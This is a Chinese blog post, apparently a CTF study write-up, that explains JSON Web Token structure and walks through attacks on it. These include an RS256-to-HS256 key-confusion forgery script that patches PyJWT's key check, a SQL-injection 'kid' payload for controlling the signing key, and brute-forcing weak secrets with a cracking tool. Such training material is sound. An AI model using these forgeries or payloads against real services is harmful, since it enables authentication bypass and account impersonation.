
<!DOCTYPE html>
<html lang="Zh-CN" class="loading">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>Json Web Token 攻击 - Ximu</title>
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate">
    <meta name="keywords" content="Xibai,"> 
    <meta name="description" content="萌新的学习记录博客QAQ,前记最近国赛+校赛遇到两次json web token的题，发现自己做的并不算顺畅，于是有了这篇学习文章。
为什么要使用Json Web TokenJson Web Token简称jwt
顾名思义，,"> 
    <meta name="author" content="Ximu"> 
    <link rel="alternative" href="atom.xml" title="Ximu" type="application/atom+xml"> 
    <link rel="icon" href="/xikong-mubai.github.io/img/favicon.png"> 
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <link rel="stylesheet" href="/xikong-mubai.github.io/css/diaspora.css">
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads" src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
</head>
</html>
<body class="loading">
    <span id="config-title" style="display:none">Ximu</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="icon-home image-icon" href="javascript:;" data-url="http://yoursite.com"></a>
    <div title="播放/暂停" class="icon-play"></div>
    <h3 class="subtitle">Json Web Token 攻击</h3>
    <div class="social">
        <!--<div class="like-icon">-->
            <!--<a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
        <!--</div>-->
        <div>
            <div class="share">
                <a title="获取二维码" class="icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class="main">
        <h1 class="title">Json Web Token 攻击</h1>
        <div class="stuff">
            <span>五月 20, 2019</span>
            
  <ul class="post-tags-list"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/xikong-mubai.github.io/tags/CTF/">CTF</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/xikong-mubai.github.io/tags/web/">web</a></li></ul>


        </div>
        <div class="content markdown">
            <p>前记<br>最近国赛+校赛遇到两次json web token的题，发现自己做的并不算顺畅，于是有了这篇学习文章。</p>
<p>为什么要使用Json Web Token<br>Json Web Token简称jwt</p>
<p>顾名思义，可以知道是用于身份认证的</p>
<p>那么为什么要有身份认证？</p>
<p>我们知道HTTP是无状态的，打个比方：</p>
<p>有状态：</p>
<p>A：你今天中午吃的啥？<br>B：吃的大盘鸡。<br>A：味道怎么样呀？<br>B：还不错，挺好吃的。</p>
<p>无状态：</p>
<p>A：你今天中午吃的啥？<br>B：吃的大盘鸡。<br>A：味道怎么样呀？<br>B：？？？啊？啥？啥味道怎么样？</p>
<p>那么怎么样可以让HTTP记住曾经发生的事情呢？</p>
<p>这里的选择可以很多：cookie,session,jwt</p>
<p>对于一般的cookie，如果我们的加密措施不当，很容易造成信息泄露，甚至信息伪造，这肯定不是我们期望的。</p>
<p>那么对于session呢？</p>
<p>对于session:客户端在服务端登陆成功之后，服务端会生成一个sessionID，返回给客户端，客户端将sessionID保存到cookie中，例如phpsessid，再次发起请求的时候，携带cookie中的sessionID到服务端，服务端会缓存该session（会话），当客户端请求到来的时候，服务端就知道是哪个用户的请求，并将处理的结果返回给客户端，完成通信。</p>
<p>但是这样的机制会存在一些问题：</p>
<p>1、session保存在服务端，当客户访问量增加时，服务端就需要存储大量的session会话，对服务器有很大的考验；</p>
<p>2、当服务端为集群时，用户登陆其中一台服务器，会将session保存到该服务器的内存中，但是当用户的访问到其他服务器时，会无法访问，通常采用缓存一致性技术来保证可以共享，或者采用第三方缓存来保存session，不方便。</p>
<p>所以这个时候就需要jwt了</p>
<p>在身份验证中，当用户使用他们的凭证成功登录时，JSON Web Token将被返回并且必须保存在本地（通常在本地存储中，但也可以使用Cookie），而不是在传统方法中创建会话服务器并返回一个cookie。</p>
<p>无论何时用户想要访问受保护的路由或资源，用户代理都应使用承载方案发送JWT，通常在授权header中。header的内容应该如下所示：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Authorization: Bearer &lt;token&gt;</span><br></pre></td></tr></table></figure></p>
<p>这是一种无状态身份验证机制，因为用户状态永远不会保存在服务器内存中。服务器受保护的路由将在授权头中检查有效的JWT，如果存在，则允许用户访问受保护的资源。由于JWT是独立的，所有必要的信息都在那里，减少了多次查询数据库的需求。</p>
<p>这使我们可以完全依赖无状态的数据API，无论哪些域正在为API提供服务，因此跨源资源共享（CORS）不会成为问题，因为它不使用Cookie。</p>
<p>Json Web Token结构<br>那么一般jwt长什么样子呢？</p>
<p>我们随便挑一个看看：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW5za3kiLCJwcml2Ijoib3RoZXIifQ.AoTc1q2NAErgqk6EeTK4MGH7cANVVF9XTy0wLv8HpgUfNcdM-etmv0Y9XmOuygF_ymV1rF6XQZzLrtkFqdMdP0NaZnTOYH35Yevaudx9bVpu9JHG4qeXo-<span class="number">0</span>TXBcpaPmBaM0V0GxyZRNIS2KwRkNaxAQDQnyTN-Yi3w8OVpJYBiI</span><br></pre></td></tr></table></figure></p>
<p>不妨解密一下<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="string">"alg"</span>:<span class="string">"RS256"</span>,<span class="string">"typ"</span>:<span class="string">"JWT"</span>&#125;&#123;<span class="string">"name"</span>:<span class="string">"adminsky"</span>,<span class="string">"priv"</span>:<span class="string">"other"</span>&#125;乱码</span><br></pre></td></tr></table></figure></p>
<p>不难看出，jwt解码后分为3个部分，由三个点（.）分隔</p>
<p>分别为：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Header</span><br><span class="line">Payload</span><br><span class="line">Signature</span><br></pre></td></tr></table></figure></p>
<p>Header<br>通常由两部分组成：令牌的类型，即JWT和正在使用的散列算法，如HMAC SHA256或RSA。</p>
<p>正如json所显示<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    <span class="string">"alg"</span>:<span class="string">"RS256"</span>,</span><br><span class="line">    <span class="string">"typ"</span>:<span class="string">"JWT"</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>alg为算法的缩写，typ为类型的缩写</p>
<p>然后，这个JSON被Base64编码，形成JSON Web Token的第一部分。</p>
<p>Payload<br>令牌的第二部分是包含声明的有效负载。声明是关于实体（通常是用户）和其他元数据的声明。</p>
<p>这里是用户随意定义的数据</p>
<p>例如上面的举例<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    <span class="string">"name"</span>:<span class="string">"adminsky"</span>,</span><br><span class="line">    <span class="string">"priv"</span>:<span class="string">"other"</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>然后将有效载荷Base64进行编码以形成JSON Web Token的第二部分。</p>
<p>但是需要注意对于已签名的令牌，此信息尽管受到篡改保护，但任何人都可以阅读。除非加密，否则不要将秘密信息放在JWT的有效内容或标题元素中。</p>
<p>Signature<br>要创建签名部分，必须采用header，payload，密钥</p>
<p>然后利用header中指定算法进行签名</p>
<p>例如HS256(HMAC SHA256),签名的构成为：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">HMACSHA256(</span><br><span class="line">  base64Encode(header) + <span class="string">"."</span> +</span><br><span class="line">  base64Encode(payload),</span><br><span class="line">  secret)</span><br></pre></td></tr></table></figure></p>
<p>然后将这部分base64编码形成JSON Web Token第三部分</p>
<p>Json Web Token攻击手段<br>既然JWT作为一种身份验证的手段，那么必然存在伪造身份的恶意攻击，那么我们下面探讨一下常见的JWT攻击手段</p>
<p>算法修改攻击<br>我们知道JWT的header部分中，有签名算法标识alg</p>
<p>而alg是用于签名算法的选择，最后保证用户的数据不被篡改。</p>
<p>但是在数据处理不正确的情况下，可能存在alg的恶意篡改</p>
<p>例如由于网站的不严谨，我们拿到了泄露的公钥pubkey</p>
<p>我们知道如果签名算法为RS256，那么会选择用私钥进行签名，用公钥进行解密验证</p>
<p>假设我们只拿到了公钥，且公钥模数极大，不可被分解，那么如何进行攻击呢？</p>
<p>没有私钥我们是几乎不可能在RS256的情况下篡改数据的，因为第三部分签名需要私钥，所以我们可以尝试将RS256改为HS256</p>
<p>此时即非对称密码变为对称加密</p>
<p>我们知道非对称密码存在公私钥问题</p>
<p>而对称加密只有一个key</p>
<p>此时如果以pubkey作为key对数据进行篡改，则会非常简单，而如果后端的验证也是根据header的alg选择算法，那么显然正中下怀。</p>
<p>下面以一道实战为例进行说明：</p>
<p>拿到题目<br><a href="http://pastebin.bxsteam.xyz" target="_blank" rel="noopener">http://pastebin.bxsteam.xyz</a></p>
<p>一开始不知道是要做什么，所以先查看源码</p>
<p>发现<br><a href="http://pastebin.bxsteam.xyz/static/js/common.js" target="_blank" rel="noopener">http://pastebin.bxsteam.xyz/static/js/common.js</a></p>
<p>其中几个点引人注目</p>
<p>关注点1：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">auth = <span class="string">"Bearer "</span> + token;</span><br><span class="line">$.ajax(&#123;</span><br><span class="line">    url: <span class="string">'/list'</span>,</span><br><span class="line">    type: <span class="string">'GET'</span>,</span><br><span class="line">    headers:&#123;<span class="string">"Authorization"</span>:auth&#125;,</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure></p>
<p>存在web token</p>
<p>关注点2:<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">function <span class="title">getpubkey</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="comment">/* </span></span><br><span class="line"><span class="comment">    get the pubkey for test</span></span><br><span class="line"><span class="comment">    /pubkey/&#123;hash&#125;</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>发现有一个存放公钥的目录</p>
<p>所以立刻想到了json web token</p>
<p>于是我抓包查看token<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW5za3kiLCJwcml2Ijoib3RoZXIifQ.AoTc1q2NAErgqk6EeTK4MGH7cANVVF9XTy0wLv8HpgUfNcdM-etmv0Y9XmOuygF_ymV1rF6XQZzLrtkFqdMdP0NaZnTOYH35Yevaudx9bVpu9JHG4qeXo-<span class="number">0</span>TXBcpaPmBaM0V0GxyZRNIS2KwRkNaxAQDQnyTN-Yi3w8OVpJYBiI</span><br></pre></td></tr></table></figure></p>
<p>使用<a href="https://jwt.io/" target="_blank" rel="noopener">https://jwt.io/</a></p>
<p>得到3段：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  <span class="string">"alg"</span>: <span class="string">"RS256"</span>,</span><br><span class="line">  <span class="string">"typ"</span>: <span class="string">"JWT"</span></span><br><span class="line">&#125;</span><br><span class="line">&#123;</span><br><span class="line">  <span class="string">"name"</span>: <span class="string">"adminsky"</span>,</span><br><span class="line">  <span class="string">"priv"</span>: <span class="string">"other"</span></span><br><span class="line">&#125;</span><br><span class="line">signature</span><br></pre></td></tr></table></figure></p>
<p>所以我的想法就是探测pubkey泄露，利用公私钥伪造json web token</p>
<p>因为这个题的机制是私钥加密，公钥解密</p>
<p>所以只要我们能拿到私钥，即可伪造json web token</p>
<p>关注到格式<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">function <span class="title">getpubkey</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="comment">/* </span></span><br><span class="line"><span class="comment">    get the pubkey for test</span></span><br><span class="line"><span class="comment">    /pubkey/&#123;hash&#125;</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>天真的我尝试了<br>md5(username)<br>md5(salt.username)<br>md5(username.salt)</p>
<p>其中salt试了无数，例如Bearer,bxs,rebirth</p>
<p>都没有成功，心态崩了，暂且搁置</p>
<p>后来得到提示<br>Web Pastebin /pubkey/md5(username+password)</p>
<p>我才发现是username+password</p>
<p>访问<br><a href="http://pastebin.bxsteam.xyz/pubkey/4eb8deaa574fdc8257e39b5dd4c6490e" target="_blank" rel="noopener">http://pastebin.bxsteam.xyz/pubkey/4eb8deaa574fdc8257e39b5dd4c6490e</a></p>
<p>得到<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="string">"pubkey"</span>:<span class="string">"-----BEGIN PUBLIC KEY-----nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtRgwKdQFRKkXupJ8lHIXT/QTinmT9lobR6+1m4ubQXFaBlM7sJkzaoasPdU6e/5dJ5TelQSC59deolcXJ1iHf4/QmzndDX3L/ShtfPXZEGKkYCKC2kF0ekBz4W4LSQfaunZEz/yoScLqz9wOP8vwxAYN+P1nFtFrTzMdBYo8begEewIDAQABn-----END PUBLIC KEY-----"</span>,<span class="string">"result"</span>:<span class="keyword">true</span>&#125;</span><br></pre></td></tr></table></figure></p>
<p>解析公钥<br>key长度：    1024<br>模数：    AD460C0A7501512A45EEA49F251C85D3FD04E2993F65A1B47AFB59B8B9B41715A06533BB099336A86AC3DD53A7BFE5D2794DE950482E7D75EA257172758877F8FD09B37435F72FF4A1B5F3D764418A91808A0B6905D1E901CF85B82D241F6AE9D9133FF2A1270BAB3F7038FF2FC3101837E3F516D16B4F331D058A3C6DE8047B<br>指数：    65537 (0x10001)</p>
<p>本想尝试分解，但发现1024bit的n基本无解，所以私钥是不可能获取了，这个时候我的思路其实被灭杀了。</p>
<p>因为没有私钥基本不能篡改json web token，毕竟无法通过消息验证码校验</p>
<p>而这里就需要修改算法RS256为HS256（非对称密码算法 =&gt; 对称密码算法）</p>
<p>算法HS256使用秘密密钥对每条消息进行签名和验证。</p>
<p>算法RS256使用私钥对消息进行签名，并使用公钥进行验证。</p>
<p>如果将算法从RS256更改为HS256，后端代码会使用公钥作为秘密密钥，然后使用HS256算法验证签名。</p>
<p>由于公钥有时可以被攻击者获取到，所以攻击者可以修改header中算法为HS256，然后使用RSA公钥对数据进行签名。</p>
<p>后端代码会使用RSA公钥+HS256算法进行签名验证。</p>
<p>即更改算法为HS256，此时即不存在公钥私钥问题，因为对称密码算法只有一个key</p>
<p>此时即我们可以任意访问的pubkey</p>
<p>故此我立刻写出了构造脚本<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> jwt</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">public</span> = open(<span class="string">'1.txt'</span>, <span class="string">'r'</span>).read()</span><br><span class="line">print jwt.encode(&#123;<span class="string">"name"</span>: <span class="string">"adminsky"</span>,<span class="string">"priv"</span>: <span class="string">"admin"</span>&#125;, key=<span class="keyword">public</span>, algorithm=<span class="string">'HS256'</span>)</span><br></pre></td></tr></table></figure></p>
<p>注：1.txt为公钥</p>
<p>priv为admin，因为之前为other，即其他人，同时只有admin可以读flag，所以这里猜测为admin</p>
<p>运行发现报错：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">File <span class="string">"G:python2.7libsite-packagesjwtalgorithms.py"</span>, line <span class="number">151</span>, in prepare_key</span><br><span class="line">    <span class="string">'The specified key is an asymmetric key or x509 certificate and'</span></span><br><span class="line">jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.</span><br></pre></td></tr></table></figure></p>
<p>发现源码的第151行爆破了，于是去跟踪库的源码</p>
<p>发现<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">def <span class="title">prepare_key</span><span class="params">(self, key)</span>:</span></span><br><span class="line"><span class="function">        key </span>= force_bytes(key)</span><br><span class="line"></span><br><span class="line">        invalid_strings = [</span><br><span class="line">            b<span class="string">'-----BEGIN PUBLIC KEY-----'</span>,</span><br><span class="line">            b<span class="string">'-----BEGIN CERTIFICATE-----'</span>,</span><br><span class="line">            b<span class="string">'-----BEGIN RSA PUBLIC KEY-----'</span>,</span><br><span class="line">            b<span class="string">'ssh-rsa'</span></span><br><span class="line">        ]</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">if</span> <span class="title">any</span><span class="params">([string_value in key <span class="keyword">for</span> string_value in invalid_strings])</span>:</span></span><br><span class="line"><span class="function">            raise <span class="title">InvalidKeyError</span><span class="params">(</span></span></span><br><span class="line"><span class="function"><span class="params">                <span class="string">'The specified key is an asymmetric key or x509 certificate and'</span></span></span></span><br><span class="line"><span class="function"><span class="params">                <span class="string">' should not be used as an HMAC secret.'</span>)</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">        return key</span></span><br></pre></td></tr></table></figure></p>
<p>prepare_key会判断是否有非法字符，简单粗暴的注释掉<br>def prepare_key(self, key):<br>        key = force_bytes(key)<br>        return key</p>
<p>保存后再运行得到<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW5za3kiLCJwcml2IjoiYWRtaW4ifQ.zc8m-ymnOrwuvd2kdsKMBVrT_9JXPXHkFf4vcPWecqI</span><br></pre></td></tr></table></figure></p>
<p>然后利用这个去访问list</p>
<p>即可得到admin的消息<br><img src="https://img-blog.csdnimg.cn/2019051621563087.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNTAwODc3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>admin:4fd5988f73c7a414f4c947e9fd708811</p>
<p>访问<br><a href="http://pastebin.bxsteam.xyz/text/admin:4fd5988f73c7a414f4c947e9fd708811" target="_blank" rel="noopener">http://pastebin.bxsteam.xyz/text/admin:4fd5988f73c7a414f4c947e9fd708811</a></p>
<p>得到flag<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="string">"content"</span>:<span class="string">"cumtctf&#123;jwt_is_not_safe_too_much&#125;"</span>,<span class="string">"result"</span>:<span class="keyword">true</span>&#125;</span><br></pre></td></tr></table></figure></p>
<p>至此，我们成功用修改算法攻击(非对称密码 =&gt; 对称密码)破解了此题</p>
<p>密钥可控问题<br>题目1：</p>
<p>在国赛中，我遇到了这样的JWT:<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">eyJ0eXAiOiJKV1QiLCJhbGciOiJzaGEyNTYiLCJraWQiOiI4MjAxIn0.eyJuYW1lIjoiYWRtaW4yMzMzIn0.aC0DlfB3pbeIqAQ18PaaTOPA5PSipJe651w7E0BZZRI</span><br><span class="line"></span><br><span class="line">header头：</span><br><span class="line">&#123;</span><br><span class="line">    <span class="string">"typ"</span>:<span class="string">"JWT"</span>,</span><br><span class="line">    <span class="string">"alg"</span>:<span class="string">"sha256"</span>,</span><br><span class="line">    <span class="string">"kid"</span>:<span class="string">"8201"</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>其中kid为密钥key的编号id</p>
<p>类似逻辑为<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sql=<span class="string">"select * from table where kid=$kid"</span></span><br></pre></td></tr></table></figure></p>
<p>这样查询出来的值即为key的值</p>
<p>但是如果我们在这里进行恶意篡改，例如<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kid = <span class="number">0</span> union select <span class="number">12345</span></span><br></pre></td></tr></table></figure></p>
<p>这样查询出来的结果必然为12345</p>
<p>这样等同于我们控制了密钥key</p>
<p>拥有了密钥key，那么即可任意伪造消息，达到成为admin登入的目的了<br>题目2：</p>
<p>同样在HITB 2017中也存在一道这样可控密钥的题目</p>
<p>这里的详情可以在最后的参考链接中查看，这里我简要叙述一下</p>
<p>首先header中同样存在kid可控问题<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    <span class="string">"kid"</span>:<span class="string">"keys/3c3c2ea1c3f113f649dc9389dd71b851"</span>,</span><br><span class="line">    <span class="string">"typ"</span>:<span class="string">"JWT"</span>,</span><br><span class="line">    <span class="string">"alg"</span>:<span class="string">"RS256"</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>并且题目存在写消息保存于本地的功能</p>
<p>于是最后可以自己写公钥，保存于服务器</p>
<p>利用kid可控的路径去加载自己写的公钥</p>
<p>然后用相应的私钥去篡改信息，伪造admin，利用我们自己写的公钥进行验证</p>
<p>密钥爆破问题<br>我们知道在HS签名算法中，只有一个密钥</p>
<p>如果这个密钥的复杂度不够，或者为弱口令</p>
<p>那么很容易导致攻击者轻松的破解，达到篡改消息，伪造身份的目的</p>
<p>破解工具也有现成的：<br><a href="https://github.com/brendan-rius/c-jwt-cracker" target="_blank" rel="noopener">https://github.com/brendan-rius/c-jwt-cracker</a></p>
<p>使用方法：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE</span><br></pre></td></tr></table></figure></p>
<p>即可得到密钥：Sn1f</p>
<p>然后即可进行消息的恶意伪造，篡改</p>
<p>参考链接<br><a href="https://jwt.io" target="_blank" rel="noopener">https://jwt.io</a><br><a href="https://www.jianshu.com/p/e64d96b4a54d" target="_blank" rel="noopener">https://www.jianshu.com/p/e64d96b4a54d</a><br><a href="https://chybeta.github.io/2017/08/29/HITB-CTF-2017-Pasty-writeup/" target="_blank" rel="noopener">https://chybeta.github.io/2017/08/29/HITB-CTF-2017-Pasty-writeup/</a><br><a href="https://delcoding.github.io/2018/03/jwt-bypass/" target="_blank" rel="noopener">https://delcoding.github.io/2018/03/jwt-bypass/</a><br><a href="http://www.cnblogs.com/dliv3/p/7450057.html" target="_blank" rel="noopener">http://www.cnblogs.com/dliv3/p/7450057.html</a></p>
<p>转载自：<a href="https://www.anquanke.com/post/id/145540" target="_blank" rel="noopener">https://www.anquanke.com/post/id/145540</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="true">
                <source type="audio/mpeg" src>
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title="0" data-url="http://music.163.com/song/media/outer/url?id=490182455.mp3"></li>
                        
                    
                        
                            <li title="1" data-url="http://music.163.com/song/media/outer/url?id=490182454.mp3"></li>
                        
                    
                </ul>
            
        </div>
        
    <div id="gitalk-container" class="comment link" data-ae="true" data-ci data-cs data-r data-o data-a data-d="false">查看评论</div>


    </div>
    
        <div class="side">
            
        </div>
    
</div>


    </div>
</div>
</body>
<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/xikong-mubai.github.io/js/plugin.js"></script>
<script src="/xikong-mubai.github.io/js/diaspora.js"></script>
<link rel="stylesheet" href="/xikong-mubai.github.io/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/xikong-mubai.github.io/photoswipe/default-skin/default-skin.css">
<script src="/xikong-mubai.github.io/photoswipe/photoswipe.min.js"></script>
<script src="/xikong-mubai.github.io/photoswipe/photoswipe-ui-default.min.js"></script>

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>




</html>
